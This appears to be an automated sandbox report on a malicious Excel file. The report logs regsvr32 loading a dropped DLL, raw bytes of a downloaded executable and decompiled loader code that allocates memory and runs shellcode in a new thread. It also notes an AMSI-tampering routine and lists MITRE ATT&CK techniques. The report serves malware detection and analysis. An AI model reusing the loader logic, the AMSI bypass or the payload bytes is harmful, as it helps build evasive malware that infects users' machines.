e0 02 00 00 30 00 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 69 04 00 00 50 03 00 00 70 04 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d2 5f 00 00 00 c0 07 00 00 60 00 00 00 80 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AAAAAAAAAASAAArAA"AArAArAARichAPELt`!@P d`UPi#0P.text7@ `.rdataPP@@.datac0@.rsrciPp@@.reloc_`@B
Jun 10, 2021 08:47:14.522572041 CEST	1195	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jun 10, 2021 08:47:14.522629023 CEST	1197	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jun 10, 2021 08:47:14.522682905 CEST	1198	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jun 10, 2021 08:47:14.522742033 CEST	1199	IN	Data Raw: 24 38 52 50 8b ce e8 dc f1 01 00 c7 44 24 30 00 00 00 00 c7 44 24 2c ec 59 02 10 8d 4c 24 48 c6 84 24 c4 00 00 00 02 51 ff 15 b4 50 02 10 50 8d 4c 24 30 e8 94 e0 01 00 8d 54 24 2c 8b ce 52 e8 ce dc 01 00 8b 4f 40 8b 06 51 8b ce ff 50 30 8b 44 24 Data Ascii: $8RPD$0D$,YL$H$QPPL$0T$,RO@QP0D$\$j%HSQPRhD$DL$@T$<PD$<QL$8RPQPT$,RO<QP0D$\$j%HSQPRhjVD$,YL$,$N2D$tGDG<PR0D$
Jun 10, 2021 08:47:14.522795916 CEST	1201	IN	Data Raw: 02 10 c3 90 90 90 90 90 90 90 90 90 90 6a ff 68 29 3c 02 10 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 51 8b 44 24 14 56 8b f1 50 6a 66 89 74 24 0c e8 af b8 01 00 8d 4e 5c c7 44 24 10 00 00 00 00 e8 93 6e 01 00 8d 4e 64 c6 44 24 10 01 e8 86 6e 01 Data Ascii: jh)<dPd%QD$VPjft$N\D$nNdD$nNlD$MD$XX@hP4TL$^dVxD$tV=u^D$lQhP W
Jun 10, 2021 08:47:14.522846937 CEST	1202	IN	Data Raw: 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 Data Ascii: jjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjt
Jun 10, 2021 08:47:14.522900105 CEST	1204	IN	Data Raw: 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a Data Ascii: tjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjj
Jun 10, 2021 08:47:14.522952080 CEST	1205	IN	Data Raw: 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 c0 74 02 ff d3 6a 00 6a 00 ff d6 85 Data Ascii: jjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjtjjt
Jun 10, 2021 08:47:14.523001909 CEST	1206	IN	Data Raw: 00 c7 44 24 18 70 24 00 00 c7 44 24 1c 12 04 00 00 ff 15 10 01 03 10 85 c0 7c 1a 8b 54 24 00 68 14 01 03 10 68 18 01 03 10 52 68 00 00 00 10 ff 15 0c 01 03 10 b8 01 00 00 00 83 c4 10 c3 90 90 90 90 90 90 90 68 00 e1 02 10 ff 15 78 52 02 10 85 c0 Data Ascii: D$p$D$\|T$hhRhhxRuSV3gztyt*ShPh0PS\|RP"hPh0Qjt5W
Jun 10, 2021 08:47:14.601202965 CEST	1208	IN	Data Raw: ec 20 01 00 00 85 c0 53 55 56 57 0f 84 1e 03 00 00 3d ff ff 00 00 c7 44 24 10 ff ff 00 00 73 06 89 44 24 10 eb 2a 80 38 23 75 25 40 50 e8 22 86 00 00 83 c4 04 3d ff ff 00 00 73 14 85 c0 74 10 89 44 24 10 25 ff ff 00 00 89 84 24 38 01 00 00 8b 9c Data Ascii: SUVW=D$sD$*8#u%@P"=stD$%$8$4f;MZk<l$}PE$<D$PjQSD$$^T$L$xBm(wJ;wz$++L$$<B rz

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 5620 Parent PID: 792

General

Start time:	08:47:09
Start date:	10/06/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0xf20000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 4912 Parent PID: 5620

General

Start time:	08:47:14
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32 -s ..\kdldyeff.dll
Imagebase:	0x870000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5800 Parent PID: 4912

General

Start time:	08:48:06
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\cmd.exe
Imagebase:
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 4912 Parent PID: 5620 regsvr32.exeCOMMON

Executed Functions

Function 029A1030, Relevance: 18.4, APIs: 12, Instructions: 362libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(029A4054,029A4040), ref: 029A1047
GetProcAddress.KERNEL32(00000000), ref: 029A104E

Part of subcall function 029A1B30: SetLastError.KERNEL32(0000000D,?,029A1070,?,00000040), ref: 029A1B3D

SetLastError.KERNEL32(000000C1), ref: 029A1096

Memory Dump Source

Source File: 00000003.00000002.340446046.00000000029A1000.00000020.00000001.sdmp, Offset: 029A1000, based on PE: false

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID:
API String ID: 1866314245-0
Opcode ID: 64e983af1220c65bc05b618481d0a0fab9a8baaaee6fb753f582cb45c1ddaff6
Instruction ID: 1264ba5641933ba890443bc503116432e43e3bea3156ea02c27e6feef0cd2493
Opcode Fuzzy Hash: 64e983af1220c65bc05b618481d0a0fab9a8baaaee6fb753f582cb45c1ddaff6
Instruction Fuzzy Hash: 6FF1E9B4E00209EFDB04CF98D995BAEB7B5BF88304F108599E909AB341D735EA41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 045D1FC0, Relevance: 21.5, APIs: 6, Strings: 6, Instructions: 455processlibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?), ref: 045D1F39
CreateProcessInternalW.KERNELBASE(?,00000000,?,00000000), ref: 045D1FCD
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 045D2020
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,?,?,?,00000000), ref: 045D251D

Strings

ftpH, xrefs: 045D245E
*Tz, xrefs: 045D20FC
ftpH, xrefs: 045D24A6
&+<, xrefs: 045D2525
&+<, xrefs: 045D2333
etpH, xrefs: 045D23B4

Memory Dump Source

Source File: 00000003.00000002.340604884.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: false

Similarity

API ID: CreateProcess$AddressDirectoryInternalProcSystem
String ID: &+<$&+<$*Tz$etpH$ftpH$ftpH
API String ID: 2329590309-1130888923
Opcode ID: ab0c68617672eeca50871c6cea3ff91d24bdaf24ce77afe3102149468f91532e
Instruction ID: 9fb603e79650bc39b3ef03d451c359ea9ffb13cac1c8d840fe03b93e99e0a25a
Opcode Fuzzy Hash: ab0c68617672eeca50871c6cea3ff91d24bdaf24ce77afe3102149468f91532e
Instruction Fuzzy Hash: 8D0247742097419FDB38CE5CD990A2EB7E1FF99745F10489AF585CB3A0E670E880AB13

Uniqueness

Uniqueness Score: -1.00%

Function 04591090, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
sleepmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04591090() {
				_Unknown_base(*)()* _v8;
				void* _v12;
				long _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				long _v24;
				void* _v28;
				void* _t25;
				void* _t30;

				_v12 = 0;
				_v20 = 0;
				_v24 = 0x5000;
				while(_v24 > 0x1000) {
					_v24 = _v24 - 1;
				}
				_v16 = _v24;
				while(_v16 > 0x40) {
					_v16 = _v16 - 1;
				}
				do {
					_t25 = VirtualAlloc(_v12, 0x43000, _v24, _v16); // executed
					_v8 = _t25;
					if(_v8 == 0) {
						Sleep(0x1f4);
					}
				} while (_v8 == 0);
				_v20 =  &(_v20->nLength);
				E04591000(_v20, _v8);
				_t30 = CreateThread(0, 0, _v8, 0, 0, 0); // executed
				_v28 = _t30;
				Sleep(0x4e20); // executed
				return _t30;
			}

0x04591096
0x0459109d
0x045910a4
0x045910ab
0x045910ba
0x045910ba
0x045910c2
0x045910c5
0x045910d1
0x045910d1
0x045910d6
0x045910e7
0x045910ed
0x045910f4
0x045910fb
0x045910fb
0x04591101
0x0459110d
0x04591118
0x0459112b
0x04591131
0x04591139
0x04591142

APIs

VirtualAlloc.KERNELBASE(00000000,00043000,00001000,00000040), ref: 045910E7
Sleep.KERNEL32(000001F4), ref: 045910FB
CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0459112B
Sleep.KERNELBASE(00004E20), ref: 04591139

Strings

@, xrefs: 045910C5

Memory Dump Source

Source File: 00000003.00000002.340581961.0000000004591000.00000020.00000001.sdmp, Offset: 04590000, based on PE: true

Associated: 00000003.00000002.340578764.0000000004590000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.340601447.00000000045C5000.00000002.00000001.sdmp Download File

Similarity

API ID: Sleep$AllocCreateThreadVirtual
String ID: @
API String ID: 2280809756-2766056989
Opcode ID: 2f7f8104046f9e39c32037925da8efe0ab4cf013dad5a45c62c3d0e468bc25d1
Instruction ID: 2a3b49ae286ebdf89c4a449a82c38b5330ef6758edc519b9140e2a8953d6e38e
Opcode Fuzzy Hash: 2f7f8104046f9e39c32037925da8efe0ab4cf013dad5a45c62c3d0e468bc25d1
Instruction Fuzzy Hash: 5B21F774E0062AFFEB00CFE4D949BAEB7B4FB44305F204559E501BA280D7B66E44AB91

Uniqueness

Uniqueness Score: -1.00%

Function 029A21A0, Relevance: 6.2, APIs: 4, Instructions: 182COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 029A21F9
SetLastError.KERNEL32(0000007E), ref: 029A223B

Memory Dump Source

Source File: 00000003.00000002.340446046.00000000029A1000.00000020.00000001.sdmp, Offset: 029A1000, based on PE: false

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: 7bc2c063bcc36087f5944a159823099e4667c525b29da30c943295d8bb2201f0
Instruction ID: b901b4bf6425a04b96f8142a654927e6940090ed8f63f783d2a202ade17a315d
Opcode Fuzzy Hash: 7bc2c063bcc36087f5944a159823099e4667c525b29da30c943295d8bb2201f0
Instruction Fuzzy Hash: 1C819674A04209EFDB04CF94C894BAEBBB5FF89314F148598E909AB355D734EA85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 029A2720, Relevance: 6.0, APIs: 4, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(029A4088), ref: 029A2731
LoadLibraryW.KERNEL32(029A409C), ref: 029A2745
LoadLibraryW.KERNEL32(029A40B4), ref: 029A2759
LoadLibraryW.KERNEL32(029A40D0), ref: 029A276D

Memory Dump Source

Source File: 00000003.00000002.340446046.00000000029A1000.00000020.00000001.sdmp, Offset: 029A1000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c981f6fe371f895e82327c52423b457d1991f7d9bff93ae37abcc831d4775735
Instruction ID: a45884f4de42332bd3cf7902382b4dec0c088a9836affb517701e341503f17df
Opcode Fuzzy Hash: c981f6fe371f895e82327c52423b457d1991f7d9bff93ae37abcc831d4775735
Instruction Fuzzy Hash: 37F062FAD50314BBF700EBF0BC3B85E7B68EA80315F005460E80A92640F9B096685BE3

Uniqueness

Uniqueness Score: -1.00%

Function 048E002D, Relevance: 4.9, APIs: 3, Instructions: 387memoryCOMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,048E0005), ref: 048E00E9
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,048E0005), ref: 048E0111

Memory Dump Source

Source File: 00000003.00000002.340703392.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID:
API String ID: 2032221330-0
Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction ID: 09612b9a5aee5920452e2793436fe7be86e004e878486a0196b5af1d2dae0161
Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
Instruction Fuzzy Hash: 1FD19D71A043269BD714CF5AC88077AB3E1BF86318F184E2DE895DB242E7B4F845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 029A1D10, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.340446046.00000000029A1000.00000020.00000001.sdmp, Offset: 029A1000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57a1937a5ff6e4dfa2293b6aa52484f1249e565b5a2be12bb79e0e3640ff230c
Instruction ID: 4a3e7a020b7d345c4e4928b570943f881fe2c5695108af8ff4463d3560b394c6
Opcode Fuzzy Hash: 57a1937a5ff6e4dfa2293b6aa52484f1249e565b5a2be12bb79e0e3640ff230c
Instruction Fuzzy Hash: C9419674A04209AFDB44CF44C4A4BAAB7B6FF88314F24C599E8195F355D775EA82CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 029A19F0, Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,029A1A51,00003000,00000004,000000BE,?,029A1A51,?), ref: 029A1A01

Memory Dump Source

Source File: 00000003.00000002.340446046.00000000029A1000.00000020.00000001.sdmp, Offset: 029A1000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1fd4ef3c7bd1560b69d4cc4cc58c5c2db8d3e6756dd1c34ce8971b6b9559ba23
Instruction ID: 84ab31185977ab47be2a884d75a697c0b7d860eb3e595efac25c2b5a9016dade
Opcode Fuzzy Hash: 1fd4ef3c7bd1560b69d4cc4cc58c5c2db8d3e6756dd1c34ce8971b6b9559ba23
Instruction Fuzzy Hash: 30D0C9B4A85208BBE710CA84D806F69BBACDB05611F004185FE089B280D5B1AE1056A5

Uniqueness

Uniqueness Score: -1.00%

Function 029A1820, Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 029A182F

Memory Dump Source

Source File: 00000003.00000002.340446046.00000000029A1000.00000020.00000001.sdmp, Offset: 029A1000, based on PE: false

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 96e502b62f3f1d5522e702b54b15bbdeb18e67c4e4060a3e02fa557a1ba41dff
Instruction ID: 9c3432e75f25d8054bca3e5c494ec74428822809d74ba0da027e5f4eadd0dab8
Opcode Fuzzy Hash: 96e502b62f3f1d5522e702b54b15bbdeb18e67c4e4060a3e02fa557a1ba41dff
Instruction Fuzzy Hash: F9C04C7655430CAB8B44DFD9E885DAB77ADBB8C610B048548BA1D87200D630F9108BA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 048E095E, Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.340703392.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
Instruction ID: 1fc02659686b68687f146f264c1350d3972776ebf30a1805a0204cefff06c808
Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
Instruction Fuzzy Hash: 32F109B4A01219EFDB04CF95C994AAEB7B1FF49304F108A58E906EB345D7B1EE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 048E0456, Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.340703392.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction ID: cd577facbc6100e96e527bfc7cb6366252d4c7e1dd1aaff398e325ad8397de16
Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction Fuzzy Hash: 3F318D3660475A8FC710DF19C580926B3E4FB8A318F050EADE99587312E374F9068B91

Uniqueness

Uniqueness Score: -1.00%

Function 029A14A0, Relevance: 12.2, APIs: 8, Instructions: 171COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 029A14DB
SetLastError.KERNEL32(0000007F), ref: 029A1507

Memory Dump Source

Source File: 00000003.00000002.340446046.00000000029A1000.00000020.00000001.sdmp, Offset: 029A1000, based on PE: false

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 7d42bac31f9c682dbcdc55f9d4d5519be237a364bfd3aacfec0064e90c48c8d3
Instruction ID: da0f7bf59b2bfe189ed845dc6dc1e1678b9f493ba10e7462cc76b9f06ee0fa45
Opcode Fuzzy Hash: 7d42bac31f9c682dbcdc55f9d4d5519be237a364bfd3aacfec0064e90c48c8d3
Instruction Fuzzy Hash: 6E71D674E44209EFDB08DF98C595AADB7B2FF48304F248599D41AAB381D734AA81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 029A24F0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(029A4070,00000000,00000800), ref: 029A2509
GetProcAddress.KERNEL32(00000000,029A4078), ref: 029A2525
VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 029A2560
VirtualProtect.KERNEL32(?,00000004,?,?), ref: 029A2581

Strings

AMSI, xrefs: 029A254C

Memory Dump Source

Source File: 00000003.00000002.340446046.00000000029A1000.00000020.00000001.sdmp, Offset: 029A1000, based on PE: false

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID: AMSI
API String ID: 3300690313-3828877684
Opcode ID: 4c3c2ca1665d6ee29c9618d4c60be1e07ac854ca81e27fe947d289ea0efeb0d3
Instruction ID: 3c4da1ab7205c2e982fbe1e2781389925bf981534661aea53f774ac43db8c919
Opcode Fuzzy Hash: 4c3c2ca1665d6ee29c9618d4c60be1e07ac854ca81e27fe947d289ea0efeb0d3
Instruction Fuzzy Hash: 3F11C9B5E44319EFDB04CF94C865BAEBBB4BF48300F104599EA02A7280D7706A54DB95

Uniqueness

Uniqueness Score: -1.00%

Function 029A2430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 029A2468
VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 029A24B2

Strings

@, xrefs: 029A2453

Memory Dump Source

Source File: 00000003.00000002.340446046.00000000029A1000.00000020.00000001.sdmp, Offset: 029A1000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 7f7e6d98340e423180d354b5e38137239a2474fff89bfff05e9f85f958288efb
Instruction ID: 61cb57c934ebe52fdd7ffc5607c626302fbb36d2e8749fdf56e17f80065bb0bb
Opcode Fuzzy Hash: 7f7e6d98340e423180d354b5e38137239a2474fff89bfff05e9f85f958288efb
Instruction Fuzzy Hash: D721CAB0E04209EFDF14CF94C994BADBBB5BF44308F108599DD09AB244C774AB40DB95

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
